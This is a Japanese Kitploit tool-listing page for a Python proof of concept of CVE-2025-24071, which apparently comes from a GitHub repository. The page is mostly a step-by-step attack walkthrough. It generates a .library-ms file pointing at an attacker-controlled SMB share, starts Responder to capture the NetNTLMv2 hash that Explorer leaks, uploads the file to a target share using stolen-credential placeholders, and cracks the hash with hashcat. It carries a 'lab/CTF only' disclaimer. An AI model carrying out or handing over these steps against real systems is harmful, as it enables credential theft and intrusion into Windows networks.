Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
PoC-CVE-2025-24071 — CVE-2025-24071のPython PoC。.library-msファイルを作成してWindows Explorerを誘導し、SMB経由でNetNTLMv2ハッシュを漏洩させ、キャプチャとクラッキングを行う。 | Kitploit
ツール/GitHubGitHub/daemon-404/poc-cve-2025-24071
パスワード攻撃脆弱性分析エクスプロイトネットワークセキュリティCTFペネトレーションテストレッドチーミングラボと実践
GitHubdaemon-404/poc-cve-2025-24071

PoC-CVE-2025-24071

CVE-2025-24071のPython PoC。.library-msファイルを作成してWindows Explorerを誘導し、SMB経由でNetNTLMv2ハッシュを漏洩させ、キャプチャとクラッキングを行う。

リポジトリを見る
13時間56分前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

❀ coerce-library

CVE-2025-24071 — .library-ms NTLM coercion (SMB / TAR method)

Theme: Rosé Pine Python: 3.9+ CVE: 2025-24071

Protocol: SMB Capture: NetNTLMv2 Use: Lab / CTF


❀ 機能

攻撃用 IP と ファイル名 を入力すると、\\<IP>\share を指す .library-ms を生成し、 それを exploit.tar にパッケージングします。Explorer がその .library-ms が置かれた フォルダを閲覧すると、UNC パスが自動的に解決され、アカウントの NTLMv2 が リスナーに漏洩します — クリックは不要です。

⚠️ 発火するのは展開された .library-ms であり、.tar ではありません。 共有上に 置かれた .tar は無害です。Explorer は tarball を解析しません。.library-ms 自体を 展開されたファイルとして共有上に置く必要があります。その方法は使用するツールに よって異なります(下記参照)。


❀ 実行方法

root@kitploit:~
uv run coerce_library.py      # or: python3 coerce_library.py
root@kitploit:~
Attack IP [10.10.14.197]:
File name [documents]:
[+] documents.library-ms  ->  \\10.10.14.197\share
[+] packed into exploit.tar

❀ その後

1) リスナー起動

root@kitploit:~
sudo responder -I tun0

2) .library-ms を書き込み可能な共有に配置

smbclient — .tar をアップロードし、tar x で サーバーサイド で展開します (展開された .library-ms がその隣に配置されます):

root@kitploit:~
smbclient //<TARGET>/<SHARE> -U '<DOMAIN>/<USER>%<PASS>' -c 'put exploit.tar; tar x exploit.tar'

smbmap — 展開ステップがないため、展開された .library-ms を直接 アップロード します(ここで .tar をアップロードしても何も起こりません — 展開できないためです):

root@kitploit:~
smbmap -H <TARGET> -d <DOMAIN> -u <USER> -p <PASS> --upload exploit.library-ms 'IT/exploit.library-ms'

共有上に展開された状態で配置されたことを確認:

root@kitploit:~
smbclient //<TARGET>/<SHARE> -U '<DOMAIN>/<USER>%<PASS>' -c 'ls' | grep library

3) キャプチャした NTLMv2 をクラック

root@kitploit:~
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

☧ authorized penetration testing / CTF / lab use only ☧

ツールをダウンロード